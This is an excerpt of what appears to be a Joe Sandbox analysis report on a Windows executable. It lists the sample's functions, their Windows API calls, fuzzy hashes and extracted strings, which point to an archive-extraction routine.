                                                            • Opcode Fuzzy Hash: 2f9c6cd2de4440bbe5c5763f6b0c89e73720bff1f77ac17a82f1b0321415f85e
                                                            • Instruction Fuzzy Hash: 83B012E2258111BCB24451082D1BC7F0E4DFBC1B11330CC2FF918C10C1D8402C0E0433
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E3FC
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 9e66bc0324789d489142e72f6d46e749ec5ee52db9d728834e2384e59222af6c
                                                            • Instruction ID: bbfe9a6fb3420a9b95042161013db934fa63b2eace76fd9c4797d70f830008a0
                                                            • Opcode Fuzzy Hash: 9e66bc0324789d489142e72f6d46e749ec5ee52db9d728834e2384e59222af6c
                                                            • Instruction Fuzzy Hash: 31B092A2258211BCA2049108281BC3F0E49FBC1B213308C2AF818C10C1D8406A090432
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E3FC
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: bd57d267016bfd71b5ae1eb16d6d877a93d5dc9adbed1bfe1937388faa29d556
                                                            • Instruction ID: e833fd119954e6fa53a26f8a7509e6fb308697c1fd095ace87d1e0aeb1336bff
                                                            • Opcode Fuzzy Hash: bd57d267016bfd71b5ae1eb16d6d877a93d5dc9adbed1bfe1937388faa29d556
                                                            • Instruction Fuzzy Hash: 06A001E62A95627DB10862556D1BC7F0E1EFAC2B253309D2EF825A54C2AC80284A1872
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E3FC
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 7dfdd3a1007d33229506d0fe2b73b4e3a86b7bbe08da985862349a7ac87d0ccf
                                                            • Instruction ID: d9bc9181c8466a94d952f4d75bb15bba938d9706df21819a16770d5bcef0ed99
                                                            • Opcode Fuzzy Hash: 7dfdd3a1007d33229506d0fe2b73b4e3a86b7bbe08da985862349a7ac87d0ccf
                                                            • Instruction Fuzzy Hash: 0CA001E62A9562BCB10862556D1BC7F0E1EFAC6B613309D2EF826954C2A880284A1872
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E3FC
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 415752fc28988a54fc13d1de554ed7a0588d28e08b01d2d1ba47bb6c2ab3b947
                                                            • Instruction ID: d9bc9181c8466a94d952f4d75bb15bba938d9706df21819a16770d5bcef0ed99
                                                            • Opcode Fuzzy Hash: 415752fc28988a54fc13d1de554ed7a0588d28e08b01d2d1ba47bb6c2ab3b947
                                                            • Instruction Fuzzy Hash: 0CA001E62A9562BCB10862556D1BC7F0E1EFAC6B613309D2EF826954C2A880284A1872
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E3FC
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 04450f3f522520f84d14068fa8d4a1e5da8345dd9a6c46ea6c2d1f8ca0c074f3
                                                            • Instruction ID: d9bc9181c8466a94d952f4d75bb15bba938d9706df21819a16770d5bcef0ed99
                                                            • Opcode Fuzzy Hash: 04450f3f522520f84d14068fa8d4a1e5da8345dd9a6c46ea6c2d1f8ca0c074f3
                                                            • Instruction Fuzzy Hash: 0CA001E62A9562BCB10862556D1BC7F0E1EFAC6B613309D2EF826954C2A880284A1872
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E3FC
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: e6adbd173cd1501b63db2e5baac329a08038de2d39afa5372f0ca0227536a28e
                                                            • Instruction ID: d9bc9181c8466a94d952f4d75bb15bba938d9706df21819a16770d5bcef0ed99
                                                            • Opcode Fuzzy Hash: e6adbd173cd1501b63db2e5baac329a08038de2d39afa5372f0ca0227536a28e
                                                            • Instruction Fuzzy Hash: 0CA001E62A9562BCB10862556D1BC7F0E1EFAC6B613309D2EF826954C2A880284A1872
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0050E3FC
                                                              • Part of subcall function 0050E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0050E8D0
                                                              • Part of subcall function 0050E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0050E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: dfe049ab33d433899b486ae5bd0927a557a61e0010b9eda4b4cd38da32690ffd
                                                            • Instruction ID: d9bc9181c8466a94d952f4d75bb15bba938d9706df21819a16770d5bcef0ed99
                                                            • Opcode Fuzzy Hash: dfe049ab33d433899b486ae5bd0927a557a61e0010b9eda4b4cd38da32690ffd
                                                            • Instruction Fuzzy Hash: 0CA001E62A9562BCB10862556D1BC7F0E1EFAC6B613309D2EF826954C2A880284A1872
                                                            APIs
                                                            • SetEndOfFile.KERNELBASE(?,004F903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 004F9F0C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: File
                                                            • String ID:
                                                            • API String ID: 749574446-0
                                                            • Opcode ID: 92b7feda9912ae2e9b0bb0f98bb2844365574466ae348f78e833ab1a293d336f
                                                            • Instruction ID: 09a0879771245ffa0b83d7bedc369e998c3a15c47325866cc1305f79b2747bbc
                                                            • Opcode Fuzzy Hash: 92b7feda9912ae2e9b0bb0f98bb2844365574466ae348f78e833ab1a293d336f
                                                            • Instruction Fuzzy Hash: F6A0123004000986CE101730C90850C3710FB217C070001945006CA061C716440B9610
                                                            APIs
                                                            • SetCurrentDirectoryW.KERNELBASE(?,0050AE72,C:\Users\user\Desktop,00000000,0053946A,00000006), ref: 0050AC08
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory
                                                            • String ID:
                                                            • API String ID: 1611563598-0
                                                            • Opcode ID: c18146f3d28a91b56d08ae53210702ba2a0da0c9be05b1624a564c6901d604d6
                                                            • Instruction ID: 402abfea90775880551de52270409819b0bb2af8f3460e2307654a6e0cd29412
                                                            • Opcode Fuzzy Hash: c18146f3d28a91b56d08ae53210702ba2a0da0c9be05b1624a564c6901d604d6
                                                            • Instruction Fuzzy Hash: 7EA011302002008B83000B328F0AA0EBAAAAFA2B00F00C028A00080030CB38C8B0FA00
                                                            APIs
                                                            • CloseHandle.KERNELBASE(000000FF,?,?,004F95D6,?,?,?,?,?,00522641,000000FF), ref: 004F963B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: 15bc69ad061a33c6f6a7e6ccafb36c10484b8ef0a52d828df9edcefcba45c8f2
                                                            • Instruction ID: cb078b51cf16ee91508d9a3ffafbd0de790d53047ba899e67f3fdeaaeb2bf614
                                                            • Opcode Fuzzy Hash: 15bc69ad061a33c6f6a7e6ccafb36c10484b8ef0a52d828df9edcefcba45c8f2
                                                            • Instruction Fuzzy Hash: 0BF0E930081B199FEB308A34C4487A377E86B12321F140B1FD2E382AE0D3686D8D8A44
                                                            APIs
                                                              • Part of subcall function 004F1316: GetDlgItem.USER32(00000000,00003021), ref: 004F135A
                                                              • Part of subcall function 004F1316: SetWindowTextW.USER32(00000000,005235F4), ref: 004F1370
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0050C2B1
                                                            • EndDialog.USER32(?,00000006), ref: 0050C2C4
                                                            • GetDlgItem.USER32(?,0000006C), ref: 0050C2E0
                                                            • SetFocus.USER32(00000000), ref: 0050C2E7
                                                            • SetDlgItemTextW.USER32(?,00000065,?), ref: 0050C321
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0050C358
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0050C36E
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0050C38C
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0050C39C
                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0050C3B8
                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0050C3D4
                                                            • _swprintf.LIBCMT ref: 0050C404
                                                              • Part of subcall function 004F4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004F40A5
                                                            • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0050C417
                                                            • FindClose.KERNEL32(00000000), ref: 0050C41E
                                                            • _swprintf.LIBCMT ref: 0050C477
                                                            • SetDlgItemTextW.USER32(?,00000068,?), ref: 0050C48A
                                                            • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0050C4A7
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0050C4C7
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0050C4D7
                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0050C4F1
                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0050C509
                                                            • _swprintf.LIBCMT ref: 0050C535
                                                            • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0050C548
                                                            • _swprintf.LIBCMT ref: 0050C59C
                                                            • SetDlgItemTextW.USER32(?,00000069,?), ref: 0050C5AF
                                                              • Part of subcall function 0050AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0050AF35
                                                              • Part of subcall function 0050AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0052E72C,?,?), ref: 0050AF84
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                            • String ID: %s %s$%s %s %s$PP$REPLACEFILEDLG
                                                            • API String ID: 797121971-3764188928
                                                            • Opcode ID: c69f3fde626c49b2654d363dedb12366dedce8a69c581fb88d104ace727a632d
                                                            • Instruction ID: 1948fbc7641eabbd82ad39b74760b75b5c767cace3dbe781feb4b6a93cd35fea
                                                            • Opcode Fuzzy Hash: c69f3fde626c49b2654d363dedb12366dedce8a69c581fb88d104ace727a632d
                                                            • Instruction Fuzzy Hash: B491A272148349BBE3219BA0CC49FFF7BACFB9A745F004919B789C20C1D775A6089722
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 004F6FAA
                                                            • _wcslen.LIBCMT ref: 004F7013
                                                            • _wcslen.LIBCMT ref: 004F7084
                                                              • Part of subcall function 004F7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 004F7AAB
                                                              • Part of subcall function 004F7A9C: GetLastError.KERNEL32 ref: 004F7AF1
                                                              • Part of subcall function 004F7A9C: CloseHandle.KERNEL32(?), ref: 004F7B00
                                                              • Part of subcall function 004FA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,004F977F,?,?,004F95CF,?,?,?,?,?,00522641,000000FF), ref: 004FA1F1
                                                              • Part of subcall function 004FA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,004F977F,?,?,004F95CF,?,?,?,?,?,00522641), ref: 004FA21F
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 004F7139
                                                            • CloseHandle.KERNEL32(00000000), ref: 004F7155
                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 004F7298
                                                              • Part of subcall function 004F9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,004F73BC,?,?,?,00000000), ref: 004F9DBC
                                                              • Part of subcall function 004F9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 004F9E70
                                                              • Part of subcall function 004F9620: CloseHandle.KERNELBASE(000000FF,?,?,004F95D6,?,?,?,?,?,00522641,000000FF), ref: 004F963B
                                                              • Part of subcall function 004FA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,004FA325,?,?,?,004FA175,?,00000001,00000000,?,?), ref: 004FA501
                                                              • Part of subcall function 004FA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,004FA325,?,?,?,004FA175,?,00000001,00000000,?,?), ref: 004FA532
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 3983180755-3508440684
                                                            • Opcode ID: 0012f6e511a0810afa9ab43e089dfa311ac7690a9118b9eed1e28a82f38fad48
                                                            • Instruction ID: 66470c7df18bad8800c51860b2fa98814ac505fbf88b84ac748ec8975cc542a4
                                                            • Opcode Fuzzy Hash: 0012f6e511a0810afa9ab43e089dfa311ac7690a9118b9eed1e28a82f38fad48
                                                            • Instruction Fuzzy Hash: F8C1D571904609AADB25DB74CC85FFFB7A8BF04304F00455AFA56E7282D73CAA48CB65
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: __floor_pentium4
                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                            • API String ID: 4168288129-2761157908
                                                            • Opcode ID: aecc8b158973600450ff0c815f147bfd41e9da635c2e9f58bc34e72ac7713a55
                                                            • Instruction ID: d4a042112f0702ecf712680dc2adf232249fce39c1ad98536dc947d721362604
                                                            • Opcode Fuzzy Hash: aecc8b158973600450ff0c815f147bfd41e9da635c2e9f58bc34e72ac7713a55
                                                            • Instruction Fuzzy Hash: 51C24A71E086298FEB25CE289D457EABBB5FB84304F1445EAD84DE7240E775AEC18F40
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1663198576.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1663182131.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663222171.0000000000523000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.000000000052E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000535000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663243291.0000000000552000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1663291759.0000000000553000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4f0000_f3I38kv.jbxd
                                                            Similarity
                                                            • API ID: H_prolog_swprintf
                                                            • String ID: CMT$h%u$hc%u
                                                            • API String ID: 146138363-3282847064
                                                            • Opcode ID: 339a378b70627d99b54a3592a8b1bb3e77ba25a9dcfacacb909f500665d1229b
                                                            • Instruction ID: 26bee5fd637b9e9a43e50a8eaaf833190ae9703e4157e13ee96277b2ab478d67
                                                            • Opcode Fuzzy Hash: 339a378b70627d99b54a3592a8b1bb3e77ba25a9dcfacacb909f500665d1229b
                                                            • Instruction Fuzzy Hash: D732E57151028C9FDF14DF74C995AFA3B95AF15304F04047EFE8A8B282DB78AA49CB24
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 004F2874
                                                            • _strlen.LIBCMT ref: 004F2E3F
                                                              • Part of subcall function 005002BA: __EH_prolog.LIBCMT ref: 005002BF
